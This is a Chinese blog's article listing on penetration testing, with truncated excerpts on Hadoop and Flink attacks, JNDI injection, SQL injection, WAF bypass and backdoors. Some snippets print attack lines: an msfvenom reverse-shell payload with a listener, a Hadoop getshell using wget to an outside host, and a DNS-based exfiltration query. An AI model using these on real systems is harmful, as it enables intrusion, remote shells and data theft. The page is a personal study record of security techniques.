自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

3569

What's the fuck ?!

转载 关于Firefox 无法抓取本地localhost数据包的问题与解决

https://blog.csdn.net/XavierDarkness/article/details/91410910服了,我说咋没配置 127.0.0.1 依然不行Mark一下,以后 就知道了 // 需要求改配置,不是单纯的 proxy 那个配置解决方法火狐浏览器中URL栏中输入about:config,打开配置页;在配置页的搜索栏搜索network.proxy.a...

2020-04-15 23:02:06 108

转载 通过 Web.config 绕过执行限制

在一个可读写的目录里无法执行脚本, 通过上传特殊的 web.config 文件突破限制.<?xml version="1.0" encoding="utf-8"?><configuration> <system.webServer> <handlers accessPolicy="Read, Write, Execute, ...

2019-08-23 12:23:34 606

转载 攻击未授权访问的 Flink 集群

Flink 是一个针对流数据和批数据的分布式处理引擎,与 Storm 一起广泛应用于分布式实时计算场景中,且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权,这就引发了非常明显的未授权问题。Flink Web UI在 macOS 上简单安装一个单节点 Flink,直接使用 Homebrew。 brew install apac...

2019-08-19 21:31:22 219

转载 axis2渗透测试wsdl文件上传

一 前言最近在渗透测试中,遇到一个比较有趣的站,因此来分享一下二 信息收集首先通过nmap进行端口扫描,同时通过dirsearch进行目录扫描,dirsearch扫描结果如下。通过目录扫描发现一些有用的信息第一 axis2构建的webservice第二 axis2的后台登录地址(/axis2/axis2-admin/)存在google axis2漏洞,发现多半都是默认口令...

2019-08-05 12:58:25 636

转载 深入理解JNDI注入与Java反序列化漏洞利用

rmi 和 jndi 这些概念,一直接触,但是看了会儿 还是略微懵逼,这篇文章 暂时理清了我的思路[承上启下]----------------------------------上边属于我自己瞎扯的,下边是kingx大佬写的---------------------------------[承上启下]在Java反序列化漏洞挖掘或利用的时候经常会遇到RMI、JNDI、JRM...

2019-08-04 19:08:33 836

转载 msf拿到shell之后的一条龙套餐

生成ps 反弹脚本 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -f psh-reflection>/tmp/search.ps1msf 监听反弹msf > use exploit/multi/handlermsf exploit(ha...

2019-08-03 17:58:50 1876

转载 基于 msf 的免杀项目的一些工具

https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自 信安之路这两个月来 持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神们开始学习来0x02 avet 工具使用此工具当年在 2017 年黑帽大会上惊艳全场,使用 kali 下载:git clonehttps://github.c...

2019-08-01 21:39:59 1892 1

转载 看了这个,谁还怕Oracle注入?

https://www.secquan.org/Prime/1069599https://mp.weixin.qq.com/s/MYkvQDpYZbz67F6qK9Ri0g微信可能图片不能直接显示,我也木得办法 ~ Mark一下 ~目录1. Oracle联合注入总结2. Oracle报错注入总结3. Oracle基于布尔的盲注总结4. Oracle基于延时的盲注总结...

2019-06-02 12:42:25 715 4

转载 windows常见后门隐藏和权限维持方法及排查技术

https://xz.aliyun.com/t/4842这片文章中隐藏webshell我觉得很nice ... 进程注入以前试过 ... wmi 和 bitsadmin 可以了解下 ...常见backdoor和persistence方式方法系统工具替换后门Image 劫持辅助工具管理器REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\...

2019-04-24 23:46:05 2250

原创 毕业设计-信息搜集

这,注定是一篇水文。但是一吐为快。 之前看某T的习惯,每周刷新一遍资产,重新看一下目标,反思再挖洞。然后想着,手动太麻烦,等了一年半,写毕设了,当作自己的代码来写 .... 刚才,磨磨蹭蹭年前开始写的,到现在,基础功能全部加上,基本上调试能用,但是个别功能(socket 扫端口)准确率只有70%。 随便添加个目标,某SRC CP吧...

2019-03-12 23:53:14 203

原创 Dnslog在SQL注入 & 四种数据库

https://www.anquanke.com/post/id/98096mysqlhttp://127.0.0.1/mysql.php?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.mysql.nk4...

2019-03-07 16:27:10 1308

原创 Hadoop 8088 Getshell

工作遇到了,有幸测试成功,记录下。首先获取 application-idcurl -v -X POST 'http://target:8088/ws/v1/cluster/apps/new-application'1.json{ "am-container-spec":{ "commands":{"command":"wget http://123123123.ce...

2019-02-28 00:50:57 717

转载 XSS Bypass List

http://drops.wooyun.org/tips/845  这个就不知道 出处了 .... 刚用到了里边的几个,稍微修改下,成功绕过WAF ~ Mark 一下 ~0x00 背景本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前...

2019-02-22 11:28:13 173

转载 命令注入 bypass list

真的全啊,备份下。原文https://xz.aliyun.com/t/3918 命令注入OS命令注入(也称为shell注入)是一种web安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统(OS)命令,通常会完全破坏应用程序及其所有数据。通常,攻击者可以利用OS命令注入漏洞来破坏宿主基础设施的其他部分,利用信任关系将攻击转移到组织内的其他系统。前置知识说到命令注入...

2019-02-12 17:10:25 420

原创 PHP - 变量覆盖 - extract()

https://chybeta.github.io/2018/11/29/phpcms-2008-type-php-%E5%89%8D%E5%8F%B0%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5getshell%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/这个函数 是因为看了下 PHPcms 前台 getshell 发现这些函数果然一个...

2018-12-21 11:24:03 342

转载 绕过PHP disable_functions

https://lab.wallarm.com/rce-in-php-or-how-to-bypass-disable-functions-in-php-installations-6ccdbf4f52bb需要翻译,我自己看了一半,感觉太慢,还是用了Google翻译 Orz 简而言之,IMAP对应RSH,可以直接绕过PHP,来代替system等执行命令。...

2018-12-13 13:52:47 732

原创 WSDL 文件测试

https://www.cnblogs.com/xueli/p/6145211.htmlhttps://www.cnblogs.com/xueli/p/9681526.html先用python大致看看,之后在考虑工具吧 输出有什么功能>>> import suds>>> url="http://www.webxml.com.cn/WebS...

2018-12-12 10:05:56 692

原创 ElasticSearch 未授权访问利用

学弟找到个自己学校的 es 未授权,尝试利用一波,学习下如何使用 :)http://www.ruanyifeng.com/blog/2017/08/elasticsearch.htmlhttp://blog.51cto.com/feelmanc/1250430上边文档写的挺不错,我基本上都是在上边学到的。增删改我不想知道,我只想知道 如何查看我想要的数据 首先找有多少数据库(其...

2018-12-05 23:12:11 4373

原创 [ssocks] 内网 socks 代理

emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了[root@target src]# ./rcsocks -h./rcsocks -hrcSocks Reverse Client Soc...

2018-12-05 10:52:33 1598

原创 PHP - 函数绕过 - escapeshell[arg|cmd]()

https://www.anquanke.com/post/id/107336发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的...

2018-11-30 11:38:01 816

原创 PHP - 函数绕过 - preg_match()

http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/ 待绕过目标如下<?phpecho preg_match('/<\?.*[(`;?>].*/is', $_GET['a']);最常见的绕过 数组http://localhost/?a...

2018-11-29 15:04:40 5233

原创 PHP - 代码执行 - create_function()

https://paper.seebug.org/94/create_function() 大致流程如下1. 获取参数, 函数体;2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串;3. eval;4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;5. 定义一个函数名:”\000_la...

2018-11-29 13:04:13 770

转载 APP漏洞挖掘工具篇 - Drozer

https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247483830&idx=1&sn=ef4bdcdca99d2928d5a0c3ae246b007f&chksm=fa177d75cd60f4639d0990f7496942a3b39edc41972577590e30a58e501f183bec689ef...

2018-11-27 10:49:48 3317 1

原创 phar 反序列化本地测试

https://xz.aliyun.com/t/2715看了上边的文章,然后根据他的代码来复现的。 众多文件操作函数能反序列化在于使用了 phar_parse_url,之后有调用到 phar_var_unserialize。生成 phar代码:  test.txt随便写就行,没必要真实存在<?php class TestObject { } $...

2018-10-24 16:24:27 452

转载 Phar与Stream Wrapper造成PHP RCE的深入挖掘

https://blog.zsxsoft.com/post/38今年的HITCON打完了,沉迷写前端搞Nextjs骚操作的我成功爆0(雾),不想写前端了.jpg。先跑个题。HITCON 2016上,orange 出了一道PHP反序列化。HITCON 2017上,orange 出了一道Phar + PHP反序列化。HITCON 2018上,orange 出了一道file_get_con...

2018-10-24 12:17:47 324

转载 在域控中滥用DNSAdmins权限的危害

https://xz.aliyun.com/t/2932翻译自:http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html翻译:聂心明昨天,我读了Shay Ber的文章,感觉非常不错,链接在https://medium.c...

2018-10-24 10:28:31 163

转载 CTF SSTI 一些记录

https://ctftime.org/writeup/10895https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/ ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼This writeup is written by @kazkiti_ctfGET / HTTP/1.1Host: shri...

2018-10-13 11:31:21 2740

转载 windows 应急流程及实战演练

对于windows方面的,目前我涉及的比较少,近期打算主攻代码审计吧。php、java的框架各种的提上日程,感觉初步可以了之后再转 windows 注册表 日志 ps 等 逐步了解 域渗透。微信 竟然不允许 图片引用,原链接在此,方便日后查看 ~ 原 URL https://mp.weixin.qq.com/s/odo2Fjtklj-ibStAsyUjHw当企业发生黑客入侵、系...

2018-10-11 23:02:49 326

原创 Linux 痕迹清理 & 隐藏进程

1. 偷换系统二进制文件( ps , top 等) 防范:  比对hash;系统完整性检查工具,比如tripwrie、aide等2. 修改hook调用函数 (修改命令返回结果,原函数getdents)防范:  sysdig(开源),检测LD_PRELOAD环境变量是否有异常,ld.so.preload文件异常(时间,大小)3. 修改进程名字防范:  /proc目录,查看exe的...

2018-09-29 11:14:40 1140

转载 文件包含姿势 较详细且全面

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/基本相关函数php中引发文件包含漏洞的通常是以下四个函数:include() include_once() require() require_once()reuqire() 如果在包含...

2018-09-13 10:52:34 3779

转载 WEB代理

https://www.secpulse.com/archives/74676.htmlhttp://gh0st.cn/archives/2018-09-11/1 之前大致见过这个东西,但是没有深入的理解,所以很久以来淡忘了看到key发的这个文章,耐心的看了一遍,了解到代理服务器(nginx,squid貌似这么拼的)一些运作机制以下是简单记录下---------------...

2018-09-12 10:55:55 869

转载 SQL注入之骚姿势小记 & 替换 绕过

https://mp.weixin.qq.com/s/ORsciwsBGQJhFdKqceprSw1、IN之骚这个我也偶然发现的,也不知前辈们有没有早已总结好的套路了。w3school上对in操作符的介绍:http://www.w3school.com.cn/sql/sql_in.asp对它的描述:IN操作符允许我们在WHERE子句中规定多个值。也就说可以让我们依照一或数个不连续(...

2018-08-29 10:25:54 1271

原创 burpsuite & python插件 & sql注入

就是想自己写一个插件,因为burp日常使用很方便,点点点,自己扫描就行别的大部分都是自己需要转发一下,太麻烦,考虑的东西还有一些,但是先记录一下 关于requests报错问题,直接下载 jython 安装,然后把已有的python site-xxx 那个文件的内容贴过来即可函数都是实现了的,部分代码 直接删了 ~ 自己补充学习咯 ~ from burp import IB...

2018-08-27 13:08:16 773

转载 nodejs & 反序列化漏洞 & 利用

https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/node.js是一个服务器端的运行环境,封装了Google V8引擎,V8引擎执行JavaScript速度非常快,性能非常好。Node.js进行了一些优化并提供替代API,这使得Google V8引擎能够在非浏览器环境下更有效的运行。但是...

2018-08-17 15:41:26 2410

转载 Linux 多个留后门姿势

https://www.anquanke.com/post/id/155943在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...

2018-08-17 10:42:52 10522

原创 Redis在Windows环境下Getshell

https://uknowsec.cn/posts/notes/Redis%E5%9C%A8Windows%E7%8E%AF%E5%A2%83%E4%B8%8BGetshell.html虽说利用过程得 重启,我觉得 还有一种就是 利用钓鱼吧,直接在桌面生成一个 windows updade.dat或者一些诱导性质的文件名让用户点击,就是稍微不靠谱点 0.0环境搭建windows版本...

2018-08-07 10:21:24 2205

原创 端口转发 kali端口转发到物理机

工作中遇到kali只能nat,进而尝试kali端口映射到物理机获取shellwindows 实测可行,ew直接报错,linux懒得用服务器测试记录如下:[windows 端口转发 netsh]端口转发的设置也可以通过命令行还进行查看netsh interface portproxy dumpnetsh interface portproxy show all转发本地的555...

2018-08-05 22:52:06 1019

转载 Burpsuite API 文档 python & java

https://www.cloud.tencent.com/developer/article/1166490自己想写个插件,找了一下午愣是没找到python稍微详细点的文档直接看别人的代码借鉴,又是感觉这里或者那里迷迷糊糊的跟朋友打了几把LOL,又找了一圈,发现这篇还挺良心的,记录一下,以防止后使用 0x01 BurpSuite API中常见的类IBurpExtender...

2018-08-04 22:54:06 1583

转载 报错注入邂逅load_file&into outfile搭讪LINES

https://xz.aliyun.com/t/24600x00 前言近期分析mysql利用报错注入读取文件内容,利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件,以及如何利用load_file扫描判断文件是否存在。0x01 into outfile写文件要求用户具有file权限 文件不能覆盖写入,所以文件必须为不存在 如果secure_f...

2018-07-25 09:50:30 902 1

转载 sql 注入 绕过 waf

https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言  这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...

2018-07-01 10:07:40 2631

提示
确定要删除当前文章?
取消 删除